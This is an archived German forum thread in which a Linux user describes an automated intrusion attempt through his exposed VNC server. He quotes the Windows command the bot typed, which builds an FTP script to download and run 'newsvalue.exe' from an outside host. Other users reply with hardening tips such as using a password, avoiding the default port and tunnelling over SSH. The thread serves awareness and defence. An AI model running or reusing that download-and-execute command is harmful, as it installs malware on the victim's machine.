PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Da wollte mich wohl jemand hacken


Unfug
2008-04-22, 21:08:29
Ich hab grad eine interessante "Begegnung" gehabt.

Zuerst bekam ich dieses PopUP Fenster:
http://img504.imageshack.us/img504/6189/bildschirmfotoaw0.th.jpg (http://img504.imageshack.us/my.php?image=bildschirmfotoaw0.jpg)
Das ist normal, da mein VNC Server so eingestellt ist. Aber ich wußte jetzt nichts davon, daß jemand rauf sollte.

Hab mir gedacht..Machste mal Texteditor auf und fragste was das Arschloch will.
Doch scheinbar war es ein automatisiertes System für Windows User (Bin aber Linux User :-D) und so bekam ich die Commandos in den Texteditor vom Script geschrieben und dann loggte sich diese Person/Bot/Script wieder aus.
Interessant war , daß das Scirpt scheinbar sogar automatisch "Start-ausführen" ausführen wollte (aber unter Linux ist das nunmal nicht da an der Stelle).


%systemroot%\system32\cmd.exe
del eq&echo open 85.182 32236 >> eq&echo user 14562 16715 >> eq &echo get newsvalue.exe >> eq &echo quit >> eq &ftp -n -s:eq &newsvalue.exe &del eq

Die IP ist abgehackt, weil ich da "leider" eine Taste gedrückt habe.
Diese Technik kannte ich noch nicht und wollte euch sie nicht vorenthalten.

Mal googlen, was diese "newsvalue" sein soll.
Bisher nichts brauchbares gefunden
Gruß

(del)
2008-04-22, 21:17:07
Läuft dein VNC auf dem Standard-Port? Dann wundert mich das wenig. Eher noch, dass das deine erste Begegnung mit einem solchen Scriptkiddy ist...

Zwergi
2008-04-23, 09:59:19
Ich versteh nich ganz... Hab auch VNC drauf aber bei mir läuft das über Passwort, bei Dir nich? Wieso kann sich da jemand bei Dir einklicken?

pollux
2008-04-23, 13:45:47
ein bischen ot:
ich würd vnc nur wenn möglich über einen ssh-tunnel nutzen...

Argo Zero
2008-04-23, 14:53:52
Als (einfache) Alternative empfehle ich logmein.